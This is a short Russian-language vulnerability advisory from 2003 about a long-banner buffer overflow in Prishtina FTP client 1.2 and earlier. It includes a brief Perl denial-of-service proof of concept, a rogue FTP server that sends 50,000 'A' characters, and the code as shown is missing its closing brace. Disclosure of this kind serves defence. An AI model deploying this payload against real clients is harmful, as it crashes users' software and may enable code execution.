| Дата публикации: | 28.05.2003 |
| Всего просмотров: | 1070 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в Prishtina FTP клиенте. Удаленный пользователь может завершить работу клиента.
Damage Hacking Group сообщает, что удаленный FTP сервер может послать длинный FTP баннер к Prishtina FTP клиенту, чтобы аварийно завершить работу клиента и возможно выполнить произвольный код на целевой системе с привилегиями целевого пользователя. DoS эксплоит:
#!/usr/bin/perl
use IO::Socket;
$host = "localhost";
$port = "21";
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM,
Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n";
$data = "A";
$num = "50000";
$buf .= $data x $num;
while ($client = $server->accept()) {
print "OK";
print $client "$buf\n";
close($client);
Уязвимость обнаружена в 1.2 и более ранние версии
|
| Ссылки: | Prishtina FTP v.1.*: remote DoS |